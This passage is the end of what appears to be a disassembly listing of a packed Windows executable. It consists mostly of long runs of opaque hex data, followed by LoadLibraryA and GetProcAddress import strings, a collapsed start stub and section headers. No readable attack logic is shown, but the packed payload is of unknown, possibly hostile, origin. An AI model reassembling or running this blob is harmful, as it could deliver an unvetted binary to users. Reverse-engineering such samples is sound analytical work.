dd 0BE548014h, 10A3353Bh, 0FA083D45h, 0C8B324A7h, 56CA4649h
dd 33C013D7h, 5071D158h, 3D3BB414h, 3438073Fh, 358AB0BDh
dd 46EF6CF3h, 23A4700Eh, 243C12CAh, 4C78B38Dh, 0B5F43317h
dd 0EA0D1A64h, 0C8590723h, 761261DDh, 901F5434h, 353DBCD1h
dd 98600AA2h, 45CA4D09h, 0C5D8D5B9h, 17D1A687h, 6A04D8E0h
dd 0A1718884h, 60BB6448h, 92928258h, 1C155364h, 12AB69A1h
dd 3C462F39h, 0CF5315ACh, 84CFA226h, 0AD78D31Ch, 0BF53C6AAh
dd 4743581Fh, 4370AB68h, 0DA112E50h, 0A08521A9h, 0A6CC20B2h
dd 0B6725819h, 211A9325h, 7AA11145h, 15A59432h, 8F411B7h
dd 664FFD4Dh, 5720BE23h, 6FBF5022h, 52463F6Eh, 644515A0h
dd 852E0F3Fh, 0D4003212h, 54CAE029h, 5377BE4Bh, 58683421h
dd 0E6B110D8h, 580E215Ah, 87244893h, 37BAD32h, 0A540D88Fh
dd 0A65E5D72h, 9845F237h, 8E4603F3h, 1870444Fh, 0A10634A0h
dd 1AAF24D8h, 88476F58h, 38E2C6C3h, 5D630C84h, 0A9812357h
dd 4F22805Bh, 90BC01F1h, 0D8BCA733h, 0EF6DBA41h, 1414BE99h
dd 0A7BCB204h, 64B7744Ah, 9EED3CA4h, 0D2AB6B8Ch, 0AA6493E0h
dd 35C92ADDh, 0F968E208h, 0A51512B4h, 3576E471h, 0B20F6C64h
dd 5EBF6D08h, 116EAF0Dh, 3EE4B8BCh, 42112650h, 43485A52h
dd 0B405CC6Ch, 0A56A02B5h, 0E7A8CF4h, 0F53D8884h, 0C844450h
dd 0A424AA45h, 0D7689A30h, 48F3D229h, 28DCE7F0h, 9E98AA12h
dd 9258A9Ch, 38346294h, 0CCB4643Eh, 719C3708h, 1B238DC4h
dd 536AEC45h, 68719021h, 52A0210Bh, 5AFF1B14h, 0A96C8553h
dd 7411A66Fh, 0B5C2ADA9h, 0B828111Bh, 89238D30h, 432EF4C4h
dd 38848AC1h, 0A84823D4h, 16929556h, 243237F3h, 630D28C0h
dd 9A4250D8h, 73759619h, 0C912E811h, 1017B12Ch, 74162C14h
dd 5C92FA8Bh, 1E09D3B4h
dd 71A860D8h, 3E51E9B1h, 130C6432h, 551767Bh, 9036940Fh
dd 8A02463Ah, 56BAB84Fh, 8CAC2220h, 0E3B4950Ch, 334789B6h
dd 0AA66732Fh, 114818E2h, 0E11311D0h, 0ECF4AAB2h, 8ED0AA1h
dd 0D44284E8h, 0DD116421h, 0F4F2D24Dh, 9A68D830h, 49D19921h
dd 2913DD08h, 20412C5Ch, 0E3EAD22Eh, 0B6E4226Dh, 0FC13057Eh
dd 0E80822A6h, 9835AD28h, 88528B97h, 30D42FB1h, 76E012DDh
dd 84482605h, 0B7A62BD7h, 0FC941B21h, 97E2D2F2h, 334C92D8h
dd 0E0847015h, 18BCA41Fh, 531680DAh, 7333F869h, 0DBC6A55Dh
dd 0CF4F349Dh, 0BC458B0Fh, 0B346C8C3h, 8FC116D3h, 4677565Bh
dd 0BDF22842h, 3CFD3A30h, 5B1938A0h, 0FBC5454h, 0A2C3A0C2h
dd 0BCFDF133h, 64609EDBh, 756F5FB9h, 422CFACDh, 360AAE29h
dd 8B2D4806h, 48A7AC71h, 8D8ED7BDh, 681682CDh, 0B2ED7083h
dd 2BAFAD8Ah, 0C9C5B17h, 469D8344h, 0D7B5C540h, 79D85B29h
dd 0E34558C8h, 0CDF60A26h, 3BB4B951h, 256D180Dh, 3A72EC54h
dd 0C99E11B7h, 91114990h, 7C7C4852h, 39F236E5h, 17FB0E08h
dd 65788B43h, 277D046Fh, 142CA573h, 49A4178Dh, 9A448EEh
dd 0DE52A5ABh, 0BCBCB04Ch, 58D7AA47h, 0D469B839h, 231497A0h
dd 0E9B3C43Fh, 8D75309Ah, 1ED29230h, 5487C5B1h, 3F490995h
dd 440DD29Fh, 0EC8A15CFh, 1837F419h, 0B7B95428h, 45B5770Ah
dd 0F256AB4h, 0E62590F8h, 40E3EE1Bh, 78DC1022h, 0C5391783h
dd 57459D54h, 5071C1D6h, 13002AA0h, 6BFA95Bh, 3115A3B5h
dd 0BD14A81Eh, 3F510869h, 884ABBA0h, 58F6B840h, 3BFBC5F6h
dd 63AC491Ah, 0CC0E412Fh, 0BE0769DAh, 0CEB81057h, 95BBD3D2h
dd 0ACC40F4Bh, 9FCAD811h, 2AD7C50Ch, 4C936A5Ch, 0A4541D3Fh
dd 484C20E3h, 0B4271740h, 38DFBE6Eh, 0C34B39A4h, 0A8C2ACB0h
dd 29B74690h, 18BAB540h, 0A8C31689h, 1BBC1BB1h, 21C59958h
dd 5B42B268h, 89CD9762h, 7C05205Bh, 8C33E2EEh, 12775B74h
dd 0DC4DF435h, 16F5D0AFh, 63C04B0Eh, 1F6FF8A8h, 0B6533244h
dd 0D9FA55A0h, 48E8361Bh, 14FBEC22h, 90F04AFDh, 8F693DBFh
dd 0E87AD191h, 0B2A24CEh, 794B3D34h, 16756ADh, 0B4D6CEDBh
dd 9467BD30h, 4D163504h, 0A04D6DCFh, 595C12D2h, 8286F9BEh
dd 8B0D1107h, 0C39590F2h, 0D20EA4ADh, 0D45CE0A1h, 571218A2h
dd 78455D5Ch, 14C52B38h, 80D339Dh, 94C3F00Ah, 533C5134h
dd 59BD392Dh, 49D02E3Bh, 0B8070466h, 80302861h, 639E8C42h
dd 867DC33Bh, 3F4EC023h, 4EC4C442h, 902B422Bh, 473C9E80h
dd 0C4508C21h, 0C076844Eh, 30F6EF86h, 0B293A0DAh, 2335591Ch
dd 5973562Bh, 497FD9Eh, 19A1E8E3h, 0ABA7FC6Eh, 9F99AE62h
dd 884C26E0h, 755B8B9Ch, 48CCB659h, 0DA5B84E8h, 0EA0599Dh
dd 0A41C9DF3h, 71DC96CAh, 55EA535Eh, 0D2A0F088h, 0C4F92983h
dd 7583A384h, 0AEDD5841h, 0C516456Eh, 2C623495h, 628CE31Ah
dd 3C3327BBh, 295B991Bh, 88886D4Ah, 0B0CA3BCh, 0D94C99C4h
dd 3224EF87h, 0D1ECAA1Dh, 0DE37B8D9h, 51430B2Eh, 3A619EE6h
dd 30643899h, 0BE333972h, 0A8B29A0Dh, 0FAC18F27h, 0BC35D95Bh
dd 166C9465h, 47A5989h, 0E0C1C6B4h, 0DFA57258h, 836313E4h
dd 92C75B34h, 0C92992AFh, 15B6A1F0h, 0B8145040h, 8EB22F58h
dd 44B44DECh, 1F58E6D9h, 1DB667C5h, 48252AF8h, 46C8444Ah
dd 0B019855Bh, 9196960Bh, 0A1EB7D40h, 8B470F61h, 96A3C5F2h
dd 25F74231h, 578972B4h, 8A4CC4EEh, 0EC219577h, 44E4815h
dd 804596A3h, 0DC4C5242h, 627C5ABCh, 0D8204864h, 11938FC9h
dd 0A392B348h, 123AA011h, 1E2CBAC5h, 62E4B15Dh, 0D802B3A8h
dd 5853B0B8h, 25AA8B4Ch, 8C558857h, 0FC367797h, 594D42AFh
dd 47C8893Ah, 31B90D85h, 0C616020Ch, 0D8520344h, 0DF1B5F28h
dd 0D2ACF30Dh, 60088C05h, 3D3B88C4h, 0F4A90CA3h, 1E92C6B1h
dd 2AEDAAF8h, 0B19FD972h, 3E166829h, 0AE044045h, 0C5B30603h
dd 5CA429A2h, 922218Fh, 7D7AB858h, 1B16184Bh, 0B4D360B3h
dd 0AB4F8CE0h, 0C197DB8Ah, 144A70B7h, 0A2341772h, 124A0C5Eh
dd 0B570060Ch, 0A37F5934h, 33C0D7FCh, 0EEC4A050h, 4888D82Ah
dd 924A5C21h, 0A63B601Ch, 16A584D8h, 0DFD5A549h, 80481364h
dd 41975C94h, 134CBC1Dh, 0DD8AE558h, 0E0308F5Bh, 4DD758BCh
dd 9B145B9Bh, 31BCB244h, 9C4A1A4Ch, 5B419F7Bh, 0B44D01Dh
dd 30A5BD31h, 8D65633Ah, 22141B46h, 0DB3091CCh, 19107FD4h
dd 0C411FAF1h, 98957BB2h, 49703363h, 482963B4h, 35164957h
dd 188ADA29h, 4710FFA4h, 425C7A50h, 0B006404Dh, 590A53B1h
dd 16224108h, 29097656h, 0D61726F0h, 9EBD0332h, 980D8414h
dd 779D8431h, 7F074C96h, 0BA0DDB3Ch, 1C0E39D6h, 58333318h
dd 6702E80h, 0B34CFD06h, 0CCF3278h, 0B297945Bh, 6BC9E6ACh
dd 97465124h, 35441FD8h, 776AA122h, 0C22C20DDh, 24219990h
dd 0DDD9EF96h, 948AA129h, 983C923Ah, 0A384204Eh, 45F8FF6Ch
dd 91FCBCF8h, 68FC880Eh, 52E05110h, 80A84439h, 45F0C412h
dd 5F2E9D5Bh, 0B64E4411h, 8CA9BB6Ah, 102AF4DAh, 5582784h
dd 55775041h, 9EF7E80Ch, 31157C98h, 195482B1h, 55E2601Eh
dd 9692453Bh, 6B2A376Ch, 57688519h, 5064680Ch, 3DCBB254h
dd 0C4F05F1Ah, 38444F9Eh, 0D68C956h, 0A09C0C68h, 2A0C468Bh
dd 296C745Bh, 9629EA98h, 4F337281h, 0B867D088h, 0A0AA2658h
dd 569A13CEh, 265A5A42h, 0BAB50DDDh, 0E27D4329h, 2D7A6564h
dd 0D26B3864h, 0B2075B69h, 0D61A0668h, 5497205h, 6CD9F644h
dd 0FC249359h, 0E29C8C44h, 0F9684C12h, 5BEC8644h, 60747C64h
dd 0F485A34h, 9BAB3A11h, 76736014h, 70DF8426h, 90EEFDDFh
dd 5B21E2BEh, 3376D964h, 9C3B7871h, 0B2A4AD95h, 0F2B10F2Dh
dd 0F47F2905h, 0A1761A9Fh, 176678B1h, 7138408Bh, 72D6B577h
dd 804D2A8Eh, 0E297B320h, 0DAF90094h, 5A3DE9BBh, 430F430Dh
dd 8B95D615h, 0E2D83F1Fh, 0D3B3DA0Bh, 0CFEB307h, 63F9B273h
dd 75E0351Ah, 4CE4E40Bh, 28089574h, 0D6E0970Ch, 0C5F42EFh
dd 3E618C8Dh, 8B942C08h, 24D84021h, 0AD3BEAE9h, 95E24B09h
dd 895ACF04h, 5C22974Dh, 108442E6h, 4B187D4Dh, 0B4D7B269h
dd 25956510h, 83BAA09Ch, 5BD8357Eh, 0E6765482h, 0AD86EB70h
dd 0D98B072h, 5CB17428h, 2A18AAA3h, 79083078h, 7A1BCAB6h
dd 15856039h, 25265C97h, 469CA39h, 7623249Ah, 0F2029EBh
dd 0E02844B2h, 2A4370B2h, 2E21B949h, 0A32C1132h, 196CF527h
dd 0BFB66D09h, 55A4F56Eh, 0CA766B6h, 81546840h, 90640C7Ch
dd 383535E5h, 0A47FC25Dh, 23B6A994h, 133E3543h, 10A35B2Dh
dd 0E14C1EA4h, 271510B4h, 3B5485B1h, 39D6350Bh, 8E32BCCEh
dd 0B1A8F874h, 42198C5Eh, 56FDA425h, 94432B1Ah, 90152421h
dd 0B1738523h, 44843C48h, 907008A4h, 45DDC8A0h, 2C0E6298h
dd 14AA2791h, 0E154C916h, 0E126A651h, 0D4228E63h, 5870D912h
dd 12EAB45Ch, 0B20430CBh, 0A8B1895Ch, 0E6EA487Dh, 8EF1506Fh
dd 8B4A58B1h, 0CFC332A8h, 0A88D3326h, 0B5C6C562h, 7D1A213Dh
dd 84A8228h, 0C39EC0Ch, 4FC32459h, 5C9B5158h, 5A8BE8C5h
dd 0E20A7553h, 35BF0B24h, 8D31937h, 81987460h, 71310750h
dd 5693BA58h, 0BC1B32B8h, 0FB1D6F10h, 0E821A373h, 0B419D4BFh
dd 6E0D808Ch, 0BD6C1749h, 86A75F38h, 0BF4C480Dh, 12060551h
dd 95A6A446h, 37822008h, 0E4EAFA4Eh, 8473C9Ch, 4CAC79C8h
dd 432F5810h, 0EF432553h
dd 0C94AD3F7h, 0BC6B303Dh, 0C4C2B225h, 76077C0Fh, 614C5CB3h
dd 0AC99A5D6h, 0F89C0A0Ah, 5B531077h, 0B0491F6Ch, 0B51A6DC4h
dd 0FCB62433h, 0AD04A05Eh, 51C85131h, 145DFBB3h, 5D47201Ch
dd 0F1D60F60h, 7E222AA6h, 0A6300FACh, 0B8D81204h, 0E263B2F9h
dd 39B03438h, 29C8484Fh, 3BB2B340h, 4E43B8C4h, 2CB3A2F1h
dd 4EBA8403h, 4DB6DA4Bh, 30CE7841h, 0FBCAB25Eh, 0C5C645A0h
dd 0F8A5292Ch, 0A20FA742h, 59D19CD2h, 75B27728h, 141A8BBDh
dd 0D90C4FFCh, 39932E65h, 282F2AD8h, 3CA8522Eh, 74293BE2h
dd 2028CC0Eh, 8441EB6h, 0B7D5F994h, 0C920664h, 128692EDh
dd 3DBDA825h, 0C34B8C94h, 24695BB2h, 3F657C5Ah, 0B61CB931h
dd 1B7B02C4h, 0DC50363Ah, 88CA7E82h, 9939CA70h, 42EC68Ch
dd 0F0A3D613h, 0A4E192CCh, 38F38D2Bh, 0B308298Eh, 71013D9h
dd 15BC853Ch, 35B44871h, 70373C59h, 0FF466932h, 0C2508B60h
dd 0B7C159B5h, 9B14DB2Ch, 741B55B9h, 0B098295Fh, 4713A74Bh
dd 0D95D2242h, 643D6825h, 37E09140h, 0D813F3C4h, 12238A45h
dd 3381CAA9h, 12981229h, 0AF51DE1Eh, 11A61299h, 5E7E8D4Ch
dd 14BBD499h, 0DE280B45h, 0AC3C504Bh, 51C2FADAh, 0B1060C08h
dd 6976741Eh, 24AC21A4h, 0C9641297h, 5A2FDAB5h, 74B6010Fh
dd 2859EFC3h, 0A179FBFAh, 0CFE06C10h, 77BECE05h, 4AADAC35h
dd 25825B87h, 0BD1F689Eh, 0BA0530AFh, 1176BCC5h, 5B9016F2h
dd 3EAB1122h, 8AE3A144h, 88495DF6h, 58042158h, 67A45D46h
dd 8A32C8C4h, 189A14A1h, 0BFB5D0CDh, 8EA1791Ah, 6EBCC04Fh
dd 2CAAB334h, 0CB9EBCFEh, 906A7049h, 29145B36h, 4253BC10h
dd 0B4D53A1h, 66A16C23h, 0E0143629h, 4C136415h, 20D88E58h
dd 9088DDB1h, 1021F24Eh, 8B50A658h, 9926590Ch, 3C01087Fh
dd 0B29D3DA0h, 4BC27077h, 7C41B4ACh, 60078C54h, 643E9C43h
dd 0BC6810C3h, 0C2706CCFh, 11AB4450h, 5818C654h, 5C218668h
dd 0C40887Ch, 0A7084467h, 80768E4Ah, 24CC33F8h, 13F27835h
dd 1BE5C6ABh, 5801E6EDh, 0E1784136h, 3C5AB5C9h, 645FB472h
dd 41A8B438h, 2FC22BB2h, 6D2B2B4Dh, 0A0F2DE4Ch, 0E56BF9BEh
dd 0A1449FDAh, 97C94C6Bh, 0AB2BD3CAh, 32CBA5C4h, 8C3C524h
dd 0DC424D58h, 580817FDh, 0BC46564Dh, 13B31C11h, 54E2AC7Ch
dd 0BB348996h, 0C4054262h, 0A08D890h, 270E051Ah, 35145D6Ch
dd 6B204CE4h, 44BE6E0Ch, 0A42BD8F8h, 5090ADB2h, 5BD15882h
dd 74723456h, 284C2552h, 8262878Eh, 2E4E404Eh, 43D6F2F4h
dd 2CD84C8Bh, 0E81ECF65h, 0A4CAF3F3h, 8C586110h, 320CAD6Eh
dd 89361688h, 854925E0h, 6FCA9D2Bh, 3443F83Bh, 29F9CF5Bh
dd 9445878Dh, 5C3C7908h, 7385BC42h, 54EA216Dh, 7E19634Dh
dd 2969A120h, 0E43D9D5Bh, 36226FC8h, 0C6B82F8Dh, 1E29E7F2h
dd 0E0E04AB1h, 9884A62Eh, 0F6154A21h, 58B8058Eh, 5CE35A8Ah
dd 0EB563DC8h, 0B68E040Ch, 4E38FD37h, 0B6A64EB4h, 0E8453FFh
dd 0C2B970AFh, 11B4463Eh, 0BBB4A63Ch, 89CF7B51h, 89E341B1h
dd 4E2442Bh, 0ADA6B8A8h, 8881CF2Eh, 0A2DC5460h, 509CB517h
dd 4AD888A1h, 69B8A78Fh, 80844AD0h, 73503306h, 0B57032B3h
dd 2B160424h, 0E9205861h, 5B4CD2C1h, 58688A1Dh, 628A7772h
dd 7AD16E5Ch, 5C8B0FCAh, 33E9C39Dh, 0E0428501h, 444E2640h
dd 0DA628300h, 4147E9AAh, 0D1723318h, 29243859h, 588908B5h
dd 35C4035Bh, 0B0323476h, 9A825EBEh, 0A335B38h, 0D1C86623h
dd 6880BE0h, 213EE0C4h, 22916768h, 83D69E0h, 82D44E78h
dd 0D1CC7E1Ah, 51B72213h, 63BD4DF5h, 0BC022226h, 0BE06A8Eh
dd 9CC54A1Ch, 25AF589h, 0F94ADCEAh, 0B35CC5B4h, 89F95279h
dd 12E5E79Ch, 2EB7B2DEh, 35C80578h, 41A80EB7h, 3EAC54D8h
dd 3F59BFCEh, 4A6AC2D6h, 883506Ch, 0A9503D48h, 3D082695h
dd 0BC716821h, 0FDC4B50Ah, 0D438D59Dh, 0E3CE773Fh, 0BA4888BBh
dd 438C7844h, 3954C860h, 283E5EE2h, 0B366E256h, 65979C20h
dd 262D2476h, 0F6C90FDCh, 0B4821BD4h, 0FEBA6DEEh, 0D2568810h
dd 0C8C5ED40h, 451AE8AEh, 505447E8h, 423F1AF0h, 859C9C5Bh
dd 8129B55h, 0E052F06Bh, 586B4230h, 55081A77h, 0BA927559h
dd 9C59CF02h, 0B114974Ah, 0EF65D19Eh, 98B2FFB8h, 1675C6CAh
dd 92995CF9h, 16A08C4Fh, 0BC8F554Bh, 0F6B1C911h, 4013BDB8h
dd 4F31EAE4h, 0C17355C9h, 0FC59B781h, 0F0CD3AB1h, 0A9D3C363h
dd 594888F0h, 3E2A068Eh, 0DD4FADB4h, 11A14F79h, 8904D44h
dd 0A1531E46h, 995D59C7h, 3A5249D6h, 67AB8550h, 0CB4B21CFh
dd 0A4215818h, 1E0EE8A5h, 4015330Bh, 0C6BCED73h, 0CFB8677h
dd 8E12F96Ch, 0C5854290h, 0E498CD14h, 3DCFE453h, 40342F45h
dd 981DAE50h, 292B8440h, 81D175Bh, 0B0643476h, 934940E6h
dd 28BDF246h, 0AACA33Dh, 0AD98D84Ah, 8BDF3E17h, 749E540Fh
dd 9337128Bh, 0A1194FFEh, 4C17239Fh, 0B41A6F3h, 0A5D8DCFBh
dd 275C50D5h, 0C542A190h, 0A5391AEFh, 0BB753244h, 868F76FDh
dd 883237D0h, 0F4A93D8Bh, 0B417A130h, 0CAE2F360h, 0A44577FDh
dd 14442032h, 64CE5841h, 5B9D4208h, 543A1BD2h, 323B4519h
dd 2833589Ah, 0EA34404Ch, 163653D8h, 0D8955198h, 23125FFFh
dd 544CE8B1h, 0EB0A8BBDh, 17E2F4D4h, 8A8B9B7Ah, 3F6389CCh
dd 1597B2C2h, 5BE19791h, 0D7654B0Ah, 40B094F2h, 63A7FCCDh
dd 232B9044h, 0F769C990h, 17C932A1h, 0ABE2B760h, 0E9161589h
dd 0AD3060FDh, 0ACC0AB83h, 442D9BE7h, 0BF8B91C5h, 72969234h
dd 0D0A38904h, 0E77BCC23h, 9D6C8345h, 398D64C4h, 59989EE8h
dd 2D953270h, 45AE45FCh, 0CB8B5940h, 1C8D25BCh, 35B917FEh
dd 0AF8C5732h, 0FCF5705Dh, 9B86C980h, 2A1FA55h, 0D4AF298Dh
dd 605494A9h, 79DBB264h, 68B22564h, 0CD1E4F5Bh, 119DA17Bh
dd 28A8590Bh, 0FC59F293h, 0E6221122h, 0F77739B7h, 0B4CC8DD8h
dd 1F8E4629h, 0B903B176h, 2804F577h, 0B78F3295h, 602D2413h
dd 0E6674BDFh, 34D81851h, 5BF53D25h, 61578E08h, 636B581Bh
dd 90A27C69h, 5441A858h, 0B1560D85h, 58BFCC0Dh, 0C47ADB96h
dd 0E3A05ACEh, 0A09679F1h, 4439D862h, 900824A2h, 5E586207h
dd 5180D85h, 2291F805h, 6E116C12h, 7A39F209h, 50F53810h
dd 8CCD3039h, 0DA1C480h, 0EE869581h, 444AE0BFh, 0B4A6BF88h
dd 92024AB9h, 8C58E248h, 5CDA3126h, 9229178Eh, 7F3B113Fh
dd 0A829D07Fh, 0CC110F93h, 510507Dh, 7D12A630h, 0B602D3DAh
dd 982E9418h, 91BDC5BCh, 35413257h, 99BB5B22h, 0EDA4DF0Dh
dd 29B81388h, 15781D60h, 906E071Fh, 0CCDBABB2h, 4596A294h
dd 8237B47h, 66BCFCB5h, 2094E825h, 16BBB6ECh, 59EECB2Dh
dd 0DE95936Fh, 0CD3C1841h, 2CDC995Bh, 353AC30Ah, 28215EF4h
dd 5284CC83h, 9817C036h, 38F82194h, 0AD58104Ch, 11E6B96Fh
dd 60BE45BEh, 0AF409CE8h, 0A68075D8h, 0B1583497h, 0D65AD239h
dd 0DCE48857h, 44203816h, 5408F1DAh, 509BA9D4h, 2F3328B5h
dd 5DE9D070h, 940D56B3h, 2E6E192Ah, 392140FDh, 0BDDF3435h
dd 219806AAh, 26B8BA34h, 0BCF00C30h, 910DA5B4h, 128CA280h
dd 21859A6Bh, 9162F59Eh, 0DB4532A2h, 3808B3CDh, 80884C42h
dd 0C88859A5h, 94B77622h, 0B46C2997h, 316844F7h, 96084B98h
dd 1E3E6E42h, 8C94D945h, 4520D80Dh, 29A89F08h, 659811DCh
dd 17050592h, 31F16458h, 0D579170Bh, 0E1DF2A5Bh, 0C2AD2008h
dd 45346D67h, 6BB635B4h
dd 0A934142Dh, 0A6C337A0h, 23D351Bh, 31347740h, 42F05388h
dd 0F2A26D5Bh, 661195D0h, 31F42003h, 409B47Eh, 4AD02FA9h
dd 38647713h, 8D2B32D9h, 37423109h, 534C883Ah, 0D2DAA2CDh
dd 0E98A9424h, 0CBFA5B19h, 0B8C89D30h, 0EE7FB3DEh, 67A95773h
dd 57B3288Bh, 6BB2254Bh, 0DE05759Ah, 440ACC92h, 0EC88B399h
dd 0B24BC8A0h, 989344FCh, 0B3EC95E9h, 38540C1Bh, 0E07C39h
dd 406B39h, 40103844h, 52454B07h, 334C304Eh, 64382E32h
dd 8001F06Ch, 43746547h, 0B3C77275h, 0B150BB6Eh, 73F5636Fh
dd 432633C7h, 0A7F7611Ch, 6F6DC352h, 68540C19h, 289D641Bh
dd 1A69DA57h, 0BF4D2219h, 2879B135h, 74D86956h, 6C611B75h
dd 2E198E41h, 44207845h, 69F570F5h, 48773AEBh, 6DB86E37h
dd 0C63EB23h, 3669461Ch, 4CAD410Ch, 3C1A7357h, 469E6657h
dd 0FE53768Ah, 4F1EC367h, 63A36A62h, 78B34FDh, 1E644162h
dd 4CCF88D4h, 69A1F49Bh, 0DAB6F762h, 91A94156h, 55498E94h
dd 86573714h, 73776FB0h, 798CA344h, 6C2AA989h, 0ACDCCFFBh
dd 0CA34A46Eh, 0BF94678Ah, 7DC044A8h, 30536C76h, 33CD73E3h
dd 910D6D46h, 0F04E0B08h, 0A7745778h, 88A0F41h, 0C8107372h
dd 0B47015D9h, 0CF76E676h, 6D0D6F28h, 33450AFDh, 37628247h
dd 1AF246B4h, 680BCA0Ch, 0A549277h, 0C427024h, 4168614Eh
dd 53485391h, 63655F67h, 46090F11h, 1314184h, 0F5436BA6h
dd 2DC0A375h, 0D0A36D2Bh, 159EECBDh, 65E8A049h, 67753862h
dd 3C726DF5h, 2D94EE38h, 9331A7A5h, 75E16F4Dh, 687CCEA1h
dd 7970893Fh, 0E7531039h, 5A9C1E41h, 0D6533F2Fh, 0D9AB7FECh
dd 733ABA68h, 62DA8A20h, 64BB1C2Bh, 9D78334Dh, 8424FF52h
dd 7A358945h, 67691D22h, 30373537h, 70795466h, 0BD5338A1h
dd 0FFE0F97Ch, 0A7EC03C9h, 89F95575h, 0A4731476h, 81B7AC63h
dd 0DF20685Fh, 64706E55h, 0CD1929BFh, 0DE47FEB2h, 6921DEA3h
dd 0B320F8A9h, 194D2ECCh, 0A4677961h, 6E1AC628h, 7901275h
dd 7D9C7049h, 77016641h, 5700110Ch, 5F473253h, 9080366h
dd 630E1344h, 49413080h, 16749C2Ah, 0A3330A44h, 6B0D9412h
dd 1484DE96h, 9034C14h, 12058912h, 480F2411h, 22729102h
dd 30C4501h, 9220901h, 16964407h, 7D470B89h, 4187F40Ah
dd 50325644h, 90F69449h, 9FE98338h, 4924E85Ah, 434DC620h
dd 58351A1h, 14591FAEh, 4FCFFA68h, 1C6ED47Dh, 43840ED1h
dd 4B78C44Dh, 3B1472E0h, 5C9B1F86h, 0C56A15C8h, 0D16D0C68h
dd 8F549631h, 6567C0C3h, 2D7244C4h, 0FE3C0973h, 67F6764Ch
dd 0EDA33EACh, 0E9BF66E3h, 4CCEF61Bh, 55AE6CFAh, 3E7B87D1h
dd 3379294Bh, 0AB413278h, 56F92624h, 64751EFCh, 241021B5h
dd 0FE6BCD32h, 756398B8h, 49FC3EBAh, 3C6F66C9h, 685E9107h
dd 443BEA10h, 534D44E4h, 434F9080h, 0C3A934Bh, 73F47254h
dd 0A6696D26h, 801C6Dh, 0
dd offset dword_406B38+1
aLoadlibrarya db 'LoadLibraryA',0
aGetprocaddress db 'GetProcAddress',0
dd 3 dup(0)
dd 700C00h
db 0
; [00000005 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
align 10h
dd 200h, 700C00h, 31Eh dup(0)
__u_____ ends
; Section 3. (virtual address 0000A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start